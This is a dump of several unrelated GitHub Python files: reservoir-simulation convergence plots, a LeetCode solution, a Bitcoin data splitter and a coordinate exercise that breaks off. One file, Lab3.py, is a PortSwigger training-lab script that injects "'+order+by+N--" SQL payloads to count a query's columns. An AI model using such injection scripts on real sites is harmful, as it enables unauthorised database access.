datas[datas.shape[0]-1:]:\n So_FOU_64 = data[6]\n Sg_FOU_64 = data[7]\n zC1_FOU_64 = data[10][1]\n zCO2_FOU_64 = data[10][0]\n xkj_FOU_64 = data[13]\n\n xkj_FOU_64[:,1,Sg_FOU_64==0] = 0\n xkj_FOU_64[:,0,So_FOU_64==0] = 0\n x_64 = np.linspace(0,1.5,len(So_FOU_64))\n n = 64\n e64_L1_FOU = (sum(abs(f(x_64)-data[10][0]))*(1/n))\n R64_L1_FOU = math.log(e32_L1_FOU/e64_L1_FOU,2)\n e64_L2_FOU = np.sqrt(np.sum((f(x_64)-data[10][0])**2) * 1 / n)\n\n t64_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_128_FOU_284.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_128 = data[6]\n Sg_FOU_128 = data[7]\n zC1_FOU_128 = data[10][1]\n zCO2_FOU_128 = data[10][0]\n xkj_FOU_128 = data[13]\n\n xkj_FOU_128[:,1,Sg_FOU_128==0] = 0\n xkj_FOU_128[:,0,So_FOU_128==0] = 0\n x_128 = np.linspace(0,1.5,len(So_FOU_128))\n n = 128\n e128_L1_FOU = (sum(abs(f(x_128)-data[10][0]))*(1/n))\n R128_L1_FOU = math.log(e64_L1_FOU/e128_L1_FOU,2)\n e128_L2_FOU = np.sqrt(np.sum((f(x_128)-data[10][0])**2) * 1 / n)\n\n t128_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_200_FOU_1125.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_200 = data[6]\n Sg_FOU_200 = data[7]\n zC1_FOU_200 = data[10][1]\n xkj_FOU_200 = data[13]\n\n xkj_FOU_200[:,1,Sg_FOU_200==0] = 0\n xkj_FOU_200[:,0,So_FOU_200==0] = 0\n x_200 = np.linspace(0,1.5,len(So_FOU_200))\n\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_256_FOU_579.npy', allow_pickle=True)\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_256_FOU_t_404.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_256 = data[6]\n Sg_FOU_256 = data[7]\n zC1_FOU_256 = data[10][1]\n zCO2_FOU_256 = data[10][0]\n xkj_FOU_256 = data[13]\n\n xkj_FOU_256[:,1,Sg_FOU_256==0] = 0\n xkj_FOU_256[:,0,So_FOU_256==0] = 0\n x_256 = np.linspace(0,1.5,len(So_FOU_256))\n n = 256\n e256_L1_FOU = (sum(abs(f(x_256)-data[10][0]))*(1/n))\n R256_L1_FOU = math.log(e128_L1_FOU/e256_L1_FOU,2)\n e256_L2_FOU = np.sqrt(np.sum((f(x_256)-data[10][0])**2) * 1 / n)\n\n t256_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_512_FOU_976.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_512 = data[6]\n Sg_FOU_512 = data[7]\n zC1_FOU_512 = data[10][1]\n zCO2_FOU_512 = data[10][0]\n xkj_FOU_512 = data[13]\n\n xkj_FOU_512[:,1,Sg_FOU_512==0] = 0\n xkj_FOU_512[:,0,So_FOU_512==0] = 0\n x_512 = np.linspace(0,1.5,len(So_FOU_512))\n n = 512\n e512_L1_FOU = (sum(abs(f(x_512)-data[10][0]))*(1/n))\n R512_L1_FOU = math.log(e256_L1_FOU/e512_L1_FOU,2)\n e512_L2_FOU = np.sqrt(np.sum((f(x_512)-data[10][0])**2) * 1 / n)\n\n t512_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_1024_FOU_2288.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_1024 = data[6]\n Sg_FOU_1024 = data[7]\n zC1_FOU_1024 = data[10][1]\n zCO2_FOU_1024 = data[10][0]\n\n x_1024 = np.linspace(0,1.5,len(So_FOU_1024))\n n = 1024\n e1024_L1_FOU = (sum(abs(f(x_1024)-data[10][0]))*(1/n))\n R1024_L1_FOU = math.log(e512_L1_FOU/e1024_L1_FOU,2)\n e1024_L2_FOU = np.sqrt(np.sum((f(x_1024)-data[10][0])**2) * 1 / n)\n\n t1024_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_2048_FOU_5139.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_2048 = data[6]\n Sg_FOU_2048 = data[7]\n zC1_FOU_2048 = data[10][1]\n zCO2_FOU_2048 = data[10][0]\n\n x_2048 = np.linspace(0,1.5,len(So_FOU_2048))\n n = 2048\n e2048_L1_FOU = (sum(abs(f(x_2048)-data[10][0]))*(1/n))\n e2048_L2_FOU = np.sqrt(np.sum((f(x_2048)-data[10][0])**2) * 1 / n)\n\n R2048_L1_FOU = math.log(e1024_L1_FOU/e2048_L1_FOU,2)\n t2048_FOU = data[2]\n\n \"\"\"----------------------------- MUSCL --------------------------------\"\"\"\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_8_MUSCL_LLF_89.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_8 = data[7]\n zC1_MUSCL_8 = data[10][1]\n zCO2_MUSCL_8 = data[10][0]\n n = 8\n e8_L1_MUSCL = (sum(abs(f(x_8)-data[10][0]))*(1/n))\n t8_MUSCL = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_16_MUSCL_108.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_16 = data[7]\n zC1_MUSCL_16 = data[10][1]\n n = 16\n e16_L1_MUSCL = (sum(abs(f(x_16)-data[10][0]))*(1/n))\n R16_L1_MUSCL = math.log(e8_L1_MUSCL/e16_L1_MUSCL,2)\n t16_MUSCL = data[2]\n\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_32_MUSCL_149.npy', allow_pickle=True)\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_32_MUSCL_MDW_197.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_32 = data[7]\n zC1_MUSCL_32 = data[10][1]\n zCO2_MUSCL_32 = data[10][0]\n n = 32\n e32_L1_MUSCL = (sum(abs(f(x_32)-data[10][0]))*(1/n))\n R32_L1_MUSCL = math.log(e16_L1_MUSCL/e32_L1_MUSCL,2)\n e32_L2_MUSCL = np.sqrt(np.sum((f(x_32)-data[10][0])**2) * 1 / n)\n\n t32_MUSCL = data[2]\n\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_64_MUSCL_352.npy', allow_pickle=True)\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_64_MUSCL_MDW_438.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_64 = data[7]\n zC1_MUSCL_64 = data[10][1]\n zCO2_MUSCL_64 = data[10][0]\n n = 64\n e64_L1_MUSCL = (sum(abs(f(x_64)-data[10][0]))*(1/n))\n R64_L1_MUSCL = math.log(e32_L1_MUSCL/e64_L1_MUSCL,2)\n e64_L2_MUSCL = np.sqrt(np.sum((f(x_64)-data[10][0])**2) * 1 / n)\n\n t64_MUSCL = data[2]\n\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_128_MUSCL_LLF_994.npy', allow_pickle=True)\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_128_MUSCL_MDW_922.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_128 = data[7]\n zC1_MUSCL_128 = data[10][1]\n zCO2_MUSCL_128 = data[10][0]\n n = 128\n e128_L1_MUSCL = (sum(abs(f(x_128)-data[10][0]))*(1/n))\n R128_L1_MUSCL = math.log(e64_L1_MUSCL/e128_L1_MUSCL,2)\n e128_L2_MUSCL = np.sqrt(np.sum((f(x_128)-data[10][0])**2) * 1 / n)\n\n t128_MUSCL = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_200_MUSCL_LLF_t_1609.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_MUSCL_200 = data[6]\n Sg_MUSCL_200 = data[7]\n z_MUSCL_200 = data[10]\n xkj_MUSCL_200 = data[13]\n\n xkj_MUSCL_200[:,1,Sg_MUSCL_200==0] = 0\n xkj_MUSCL_200[:,0,So_MUSCL_200==0] = 0\n t_MUSCL_200 = data[2]\n\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_256_MUSCL_LLF_t_2044.npy', allow_pickle=True)\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_256_MUSCL_MDW_1832.npy', allow_pickle=True)\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_256_MUSCL_LLF_t_1434.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_256 = data[7]\n zC1_MUSCL_256 = data[10][1]\n zCO2_MUSCL_256 = data[10][0]\n n = 256\n e256_L1_MUSCL = (sum(abs(f(x_256)-data[10][0]))*(1/n))\n e256_L2_MUSCL = np.sqrt(np.sum((f(x_256)-data[10][0])**2) * 1 / n)\n R256_L1_MUSCL = math.log(e128_L1_MUSCL/e256_L1_MUSCL,2)\n t256_MUSCL = data[2]\n\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_512_MUSCL_LLF_9198.npy', allow_pickle=True)\n #datas = np.load('flying/results_case1_Moshiri_Manzari_5k_512_MUSCL_LLF_4260.npy', allow_pickle=True)\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_512_MUSCL_MDW_3662.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_512 = data[7]\n zC1_MUSCL_512 = data[10][1]\n zCO2_MUSCL_512 = data[10][0]\n n = 512\n e512_L2_MUSCL = np.sqrt(np.sum((f(x_512)-data[10][0])**2) * 1 / n)\n e512_L1_MUSCL = (sum(abs(f(x_512)-data[10][0]))*(1/n))\n R512_L1_MUSCL = math.log(e256_L1_MUSCL/e512_L1_MUSCL,2)\n t512_MUSCL = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_1024_MUSCL_7654.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_1024 = data[7]\n zC1_MUSCL_1024 = data[10][1]\n zCO2_MUSCL_1024 = data[10][0]\n n = 1024\n x_1024 = np.linspace(0, 1.5, 1024)\n e1024_L1_MUSCL = (sum(abs(f(x_1024)-data[10][0]))*(1/n))\n R1024_L1_MUSCL = math.log(e512_L1_MUSCL/e1024_L1_MUSCL,2)\n t1024_MUSCL = data[2]\n\n '''datas = np.load('flying/results_case1_Moshiri_Manzari_5k_2048_LLF_7654.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n Sg_MUSCL_2048 = data[7]\n zC1_MUSCL_2048 = data[10][1]\n zCO2_MUSCL_2048 = data[10][0]\n n = 2048\n e2048_L1_MUSCL = (sum(abs(f(x_2048)-data[10][0]))*(1/n))\n #R2048_L1_MUSCL = math.log(e512_L1_MUSCL/e2048_L1_MUSCL,2)\n t2048_MUSCL = data[2]'''\n\n size = 5\n plt.figure(1)\n plt.plot(x_MOC, Sg_MOC, 'k')\n #plt.plot(x_8, Sg_MUSCL_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_MUSCL_16, '-y', mfc='none')\n plt.plot(x_32, Sg_MUSCL_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, Sg_MUSCL_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, Sg_MUSCL_128, '-mD', mfc='none', markersize=size)\n #plt.plot(x_200, Sg_MUSCL_200, 'y', mfc='none', markersize=size)\n plt.plot(x_256, Sg_MUSCL_256, '-cs', mfc='none', markersize=size)\n #plt.plot(x_512, Sg_MUSCL_512, '-rv', mfc='none', markersize=size)\n #plt.plot(x_1024, Sg_MUSCL_1024, '-y')\n plt.legend(('MOC', 'MUSCL-32', 'MUSCL-64', \\\n 'MUSCL-128', 'MUSCL-256'))\n plt.grid()\n plt.ylabel('Sg')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_Sg_MUSCL.png')\n\n plt.figure(2)\n plt.plot(x_MOC, Sg_MOC, 'k')\n #plt.plot(x_8, Sg_FOU_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_FOU_16, '-y', mfc='none')\n plt.plot(x_32, Sg_FOU_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, Sg_FOU_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, Sg_FOU_128, '-mD', mfc='none', markersize=size)\n plt.plot(x_256, Sg_FOU_256, '-cs', mfc='none', markersize=size)\n #plt.plot(x_512, Sg_FOU_512, '-rv', mfc='none', markersize=size)\n plt.legend(('MOC', 'FOU-32', 'FOU-64', \\\n 'FOU-128', 'FOU-256'))\n plt.grid()\n plt.ylabel('Sg')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_Sg_FOU.png')\n\n plt.figure(3)\n plt.plot(x_MOC, Sg_MOC, 'k')\n #plt.plot(x_8, Sg_MUSCL_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_MUSCL_16, '-y', mfc='none')\n plt.plot(x_32, Sg_MUSCL_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, Sg_MUSCL_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, Sg_MUSCL_128, '-mD', mfc='none', markersize=size)\n #plt.plot(x_200, Sg_MUSCL_200, 'ys', mfc='none', markersize=size)\n plt.plot(x_256, Sg_MUSCL_256, '-c<', mfc='none', markersize=size)\n #plt.plot(x_512, Sg_MUSCL_512, '-r*', mfc='none', markersize=6)\n plt.legend(('MOC', 'MUSCL-32', 'MUSCL-64', \\\n 'MUSCL-128', 'MUSCL-256'))\n plt.grid()\n plt.xlim((0.5, 1.2))\n plt.ylim((0.4, 1))\n plt.ylabel('Sg')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_Sg_MUSCL_zoom.png')\n\n plt.figure(4)\n plt.plot(x_MOC, Sg_MOC, 'k')\n #plt.plot(x_8, Sg_FOU_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_FOU_16, '-y', mfc='none')\n plt.plot(x_32, Sg_FOU_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, Sg_FOU_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, Sg_FOU_128, '-mD', mfc='none', markersize=size)\n plt.plot(x_256, Sg_FOU_256, '-cs', mfc='none', markersize=size)\n #plt.plot(x_512, Sg_FOU_512, '-rv', mfc='none', markersize=size)\n plt.legend(('MOC', 'FOU-32', 'FOU-64', \\\n 'FOU-128', 'FOU-256'))\n plt.grid()\n plt.xlim((0.5, 1.2))\n plt.ylim((0.4, 1))\n plt.ylabel('Sg')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_Sg_FOU_zoom.png')\n\n plt.figure(5)\n plt.plot(x_zC1_MOC, zC1_MOC, 'k')\n #plt.plot(x_8, Sg_MUSCL_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_MUSCL_16, '-y', mfc='none')\n plt.plot(x_32, zC1_MUSCL_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, zC1_MUSCL_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, zC1_MUSCL_128, '-mD', mfc='none', markersize=size)\n plt.plot(x_256, zC1_MUSCL_256, '-cs', mfc='none', markersize=size)\n plt.plot(x_512, zC1_MUSCL_512, '-rv', mfc='none', markersize=size)\n plt.legend(('MOC', 'MUSCL-32', 'MUSCL-64', \\\n 'MUSCL-128', 'MUSCL-256', 'MUSCL-512'))\n plt.grid()\n plt.xlim((1, 1.14))\n plt.ylim((0, 0.65))\n plt.ylabel('$z_{C_1}$')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_zC1_MUSCL.png')\n\n plt.figure(6)\n plt.plot(x_zC1_MOC, zC1_MOC, 'k')\n #plt.plot(x_8, Sg_FOU_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_FOU_16, '-y', mfc='none')\n plt.plot(x_32, zC1_FOU_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, zC1_FOU_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, zC1_FOU_128, '-mD', mfc='none', markersize=size)\n plt.plot(x_256, zC1_FOU_256, '-cs', mfc='none', markersize=size)\n plt.plot(x_512, zC1_FOU_512, '-rv', mfc='none', markersize=size)\n plt.legend(('MOC', 'FOU-32', 'FOU-64', \\\n 'FOU-128', 'FOU-256', 'FOU-512'))\n plt.grid()\n plt.xlim((1, 1.14))\n plt.ylim((0, 0.65))\n plt.ylabel('$x_{C_1}')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_zC1_FOU.png')\n\n plt.figure(7)\n x = np.log10(np.array([32,64,128,256,512]))\n eL1_FOU = np.log10(np.array([e32_L1_FOU, e64_L1_FOU, \\\n e128_L1_FOU, e256_L1_FOU, e512_L1_FOU]))\n eL1_MUSCL = np.log10(np.array([e32_L1_MUSCL, e64_L1_MUSCL, \\\n e128_L1_MUSCL, e256_L1_MUSCL, e512_L1_MUSCL]))\n y = -x\n plt.plot(x, eL1_FOU, '-ro', mfc='none', markersize=size)\n plt.plot(x, eL1_MUSCL, '-gs', mfc='none', markersize=size)\n plt.plot(x,y,'k')\n plt.legend(('FOU', 'MUSCL', 'Primeira Ordem'))\n plt.grid()\n plt.ylabel('$log(E_{L1})$')\n plt.xlabel('log($n_b$)')\n plt.savefig('results/compositional/TCC2/5k_eL1_zCO2.png')\n\n plt.figure(8)\n x = (np.array([32,64,128,256,512]))\n t_FOU = (np.array([t32_FOU, t64_FOU, \\\n t128_FOU, t256_FOU, t512_FOU]))\n t_MUSCL = (np.array([t32_MUSCL, t64_MUSCL, \\\n t128_MUSCL, t256_MUSCL, t512_MUSCL]))\n plt.plot(x, t_FOU, '-ro', mfc='none', markersize=size)\n plt.plot(x, t_MUSCL, '-gs', mfc='none', markersize=size)\n plt.legend(('FOU', 'MUSCL', 'Primeira Ordem'))\n plt.grid()\n plt.ylabel('Tempo computacional [s]')\n plt.xlabel('Número de volumes de controle')\n plt.savefig('results/compositional/TCC2/5k_time.png')\n\n plt.figure(9)\n x = (np.array([32,64,128,256,512]))\n t_FOU = (np.array([t32_FOU, t64_FOU, \\\n t128_FOU, t256_FOU, t512_FOU, t1024_FOU]))\n t_MUSCL = (np.array([t32_MUSCL, t64_MUSCL, \\\n t128_MUSCL, t256_MUSCL, t512_MUSCL]))\n eL1_FOU = (np.array([e32_L1_FOU, e64_L1_FOU, \\\n e128_L1_FOU, e256_L1_FOU, e512_L1_FOU, e1024_L1_FOU]))\n eL1_MUSCL = (np.array([e32_L1_MUSCL, e64_L1_MUSCL, \\\n e128_L1_MUSCL, e256_L1_MUSCL, e512_L1_MUSCL]))\n size_FOU = 7\n size_MUSCL = 7\n #plt.plot(t_FOU,eL1_FOU, '-ro', mfc='none', markersize=size)\n #plt.plot(t_MUSCL,eL1_MUSCL, '-gs', mfc='none', markersize=size)\n plt.plot(t32_FOU, e32_L1_FOU, '-ro', mfc='none', markersize=size_FOU)\n plt.plot(t32_MUSCL, e32_L1_MUSCL, '-go', mfc='g', markersize=size_MUSCL)\n plt.plot(t64_FOU, e64_L1_FOU, '-rs', mfc='none', markersize=size_FOU)\n plt.plot(t64_MUSCL, e64_L1_MUSCL, '-gs', mfc='g', markersize=size_MUSCL)\n plt.plot(t128_FOU, e128_L1_FOU, '-rv', mfc='none', markersize=size_FOU)\n plt.plot(t128_MUSCL, e128_L1_MUSCL, '-gv', mfc='g', markersize=size_MUSCL)\n plt.plot(t256_FOU, e256_L1_FOU, '-rp', mfc='none', markersize=size_FOU)\n plt.plot(t256_MUSCL, e256_L1_MUSCL, '-gp', mfc='g', markersize=size_MUSCL)\n plt.plot(t512_FOU, e512_L1_FOU, '-rD', mfc='none', markersize=size_FOU)\n plt.plot(t512_MUSCL, e512_L1_MUSCL, '-gD', mfc='g', markersize=size_MUSCL)\n plt.plot(t1024_FOU, e1024_L1_FOU, '-r*', mfc='none', markersize=size_FOU)\n plt.plot(t2048_FOU, e2048_L1_FOU, '-r<', mfc='none', markersize=size_FOU)\n legend_elements = [Line2D([0], [0], color='g', label='MUSCL'),\n Line2D([0], [0], color='w', markerfacecolor='g', marker='o', markeredgecolor='g', label='32 CV', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], marker='s', color='w', markerfacecolor='g', label='64 CV', markeredgecolor='g', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], marker='v', color='w', markerfacecolor='g',label='128 CV',markeredgecolor='g', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], marker='p', color='w', markerfacecolor='g', label='256 CV',markeredgecolor='g', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], marker='D', color='w', markerfacecolor='g', label='512 CV',markeredgecolor='g', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], marker='D', color='w', markerfacecolor='none', label=' ',markeredgecolor='w', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], marker='D', color='w', markerfacecolor='none', label=' ',markeredgecolor='w', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], color='r', label='FOU'),\n Line2D([0], [0], color='w', marker='o', markeredgecolor='r', label='32 CV', markersize=size_FOU, mfc='none'),\n Line2D([0], [0], marker='s', color='w', label='64 CV', markeredgecolor='r', markersize=size_FOU, mfc='none'),\n Line2D([0], [0], marker='v', color='w', label='128 CV',markeredgecolor='r', markersize=size_FOU, mfc='none'),\n Line2D([0], [0], marker='p', color='w', label='256 CV',markeredgecolor='r', markersize=size_FOU, mfc='none'),\n Line2D([0], [0], marker='D', color='w', label='512 CV',markeredgecolor='r', markersize=size_FOU, mfc='none'),\n Line2D([0], [0], marker='*', color='w', label='1024 CV',markeredgecolor='r', markersize=size_FOU, mfc='none'),\n Line2D([0], [0], marker='<', color='w', label='2048 CV',markeredgecolor='r', markersize=size_FOU, mfc='none'),]\n # Create the figure\n plt.legend(handles=legend_elements, ncol=2,)\n #plt.legend(('FOU', 'MUSCL', 'First Order'))\n plt.grid()\n plt.xlabel('Tempo computacional [s]')\n plt.ylabel('$E_{L1}$')\n plt.xscale('log')\n plt.yscale('log')\n plt.savefig('results/compositional/TCC2/5k_time_eL1.png')\n\n\n plt.figure(10)\n plt.plot(x_4000, zCO2_FOU_4000, 'k')\n #plt.plot(x_8, Sg_MUSCL_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_MUSCL_16, '-y', mfc='none')\n plt.plot(x_32, zCO2_MUSCL_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, zCO2_MUSCL_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, zCO2_MUSCL_128, '-mD', mfc='none', markersize=size)\n plt.plot(x_256, zCO2_MUSCL_256, '-cs', mfc='none', markersize=size)\n #plt.plot(x_512, zCO2_MUSCL_512, '-rv', mfc='none', markersize=size)\n plt.legend(('FOU-4000', 'MUSCL-32', 'MUSCL-64', \\\n 'MUSCL-128', 'MUSCL-256'), loc=3)\n plt.grid()\n plt.xlim((0, 1.1))\n plt.ylim((0.75, 1))\n plt.ylabel('$z_{CO_2}$')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_zCO2_MUSCL.png')\n\n plt.figure(11)\n plt.plot(x_4000, zCO2_FOU_4000, 'k')\n #plt.plot(x_8, Sg_FOU_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_FOU_16, '-y', mfc='none')\n plt.plot(x_32, zCO2_FOU_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, zCO2_FOU_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, zCO2_FOU_128, '-mD', mfc='none', markersize=size)\n plt.plot(x_256, zCO2_FOU_256, '-cs', mfc='none', markersize=size)\n #plt.plot(x_512, zCO2_FOU_512, '-rv', mfc='none', markersize=size)\n plt.legend(('FOU-4000', 'FOU-32', 'FOU-64', \\\n 'FOU-128', 'FOU-256'), loc=3)\n plt.grid()\n plt.xlim((0, 1.1))\n plt.ylim((0.75, 1))\n plt.ylabel('$z_{CO_2}$')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_zCO2_FOU.png')\n\n import pdb; pdb.set_trace()\n","repo_name":"DudaGalindo/compositional_adm","sub_path":"case_1d_5k_MM_convergence.py","file_name":"case_1d_5k_MM_convergence.py","file_ext":"py","file_size_in_byte":28962,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"30723679552","text":"#!/usr/bin/python3\n\n#by Davinci\n#Lab3: SQL injection UNION attack, determining the number of columns returned by the query\n#https://portswigger.net/\n\nfrom pwn import *\nimport sys\nimport requests\nimport signal, time\nfrom bs4 import BeautifulSoup\nimport urllib3\n\n#HttpsNoWarning\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n#ctrl_fuction\n\ndef ctrl_Fuction(sig, frames):\n\tprint(\"[!]Saliendo...\")\n\tsys.exit(1)\n\nsignal.signal(signal.SIGINT, ctrl_Fuction)\n\n#Proxies\n\nproxies = { 'http':'127.0.0.1:8080', 'https':'127.0.0.1:8080'}\n\ndef sql_UnionExploit(url):\n\turi = \"filter?category=\"\n\tbar = log.progress(\"[!] Iniciando Injection\")\n\tbar.status(\"[!] Determinando el numero de columnas\")\n\n\tfor i in range(1,50):\n\t\tpayload = \"'+order+by+%s--\" %i\n\t\tr = requests.get(url + uri + payload, verify=False, proxies=proxies)\n\t\tresp = r.text\n\t\tif \"Internal Server Error\" in resp:\n\t\t\treturn i - 1\n\t\telse:\n\t\t\ti += 1\n\treturn False\n\n#functionhelPanel\ndef helPanel():\n\tprint(\"[!]Usage %s \" %sys.argv[0])\n\tprint(\"[!] Example python3 %s www.mipagina.com \" %sys.argv[0])\n\n\nif __name__ == '__main__':\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept IndexError:\n\t\thelPanel()\n\n\tnum_column= sql_UnionExploit(url)\n\t\n\tif num_column:\n\t\tprint(\"[!] El numero de columna es: %s \" %num_column)\n\telse:\n\t\tprint(\"[!] La injection no fue exitosa\")\n","repo_name":"DaVinciRoot/SQLi-Labs-Scripts","sub_path":"Lab3.py","file_name":"Lab3.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39829708836","text":"# given a string s, partition the string so that each letter appears only in one partition\n# find the range of each letter in the str and update the right pointer \n# if new_letter appears within prev one's, we have to include it\n# map store the last apearance position of a letter\nclass Solution:\n def partitionLabels(self, s: str) -> List[int]: \n myMap = collections.defaultdict(int)\n for index, l in enumerate(s): \n myMap[l] = index\n result = []\n left, right = 0, -1\n for index, l in enumerate(s):\n if myMap[l]>right: \n right = myMap[l]\n if index==right: \n result.append(right-left+1)\n left = right+1 \n return result\n","repo_name":"MaTasty/Grind","sub_path":"partitionLabels.py","file_name":"partitionLabels.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17815058187","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom utils import shift\nimport argparse\nfrom sklearn.model_selection import train_test_split\n\n\n\t\ndef Split(train_size,price_only,shift_param,per_change, features = [\"Open\",\"High\",\"Low\",\"Close\"],save = True):\n\tdf = pd.read_csv(\"Datasets/final_Bitcoin_dataset.csv\",index_col = 0)\n\tif per_change:\n\t\tgls = \"change in price\"\n\telse:\n\t\tgls = \"Weighted_Price\"\n\tif price_only:\n\t\tX = df[\"Weighted_Price\"][:-1]\n\telse:\n\t\tX = df[features][:-1]\n\ty = df[gls][:-1]\n\tX_train, X_test, y_train, y_test = train_test_split(X,y,\n shuffle = False,\n train_size = train_size)\n\ttry : \n\t\tos.mkdir(\"Datasets/split\")\n\texcept:\n\t\t1\n\n\tX_train,y_train = shift(X_train,y_train,shift_param)\n\tX_test,y_test = shift(X_test,y_test,shift_param)\n\t\t\t\n\tif save:\n\t\tnp.save(\"./Datasets/split/X_train.npy\",X_train)\n\t\tnp.save(\"./Datasets/split/X_test.npy\",X_test)\n\t\tnp.save(\"./Datasets/split/y_train.npy\",y_train)\n\t\tnp.save(\"./Datasets/split/y_test.npy\",y_test)\n\telse:\n\t\treturn X_train,y_train\n\n\n\ndef main(train_size,price_only,shift_param,per_change):\n\n\tSplit(train_size,price_only,shift_param,per_change)\n\n\t\nif __name__ == '__main__':\n main()\n","repo_name":"ea137/Comparative-Study-of-Prediction-Models-in-Bitcoin-Forecasting-and-Resolve-of-The-Bounds-Limitation","sub_path":"dataSplitting.py","file_name":"dataSplitting.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"22239882229","text":"# Definimos una lista que contiene las etiquetas de los cuadrantes y el mensaje para el origen del sistema de coordenadas.\ncuadrantes = ['Origen', 'Eje Y', 'Eje X', 'Cuadrante I', 'Cuadrante II', 'Cuadrante III', 'Cuadrante IV']\n\n# Creamos un bucle infinito usando \"while True\" para que el programa se repita continuamente hasta que se rompa.\nwhile True:\n # Solicitamos al usuario que ingrese los valores de 'x' e 'y' y los convertimos a enteros usando int().\n x = int(input('Ingresa el valor de x: '))\n y = int(input('Ingresa el valor de y: '))\n\n # Evaluamos las coordenadas para determinar en qué cuadrante se encuentra el punto.\n if x == 0 and y == 0:\n print(cuadrantes[0]) # Si ambos valores son cero, el punto está en 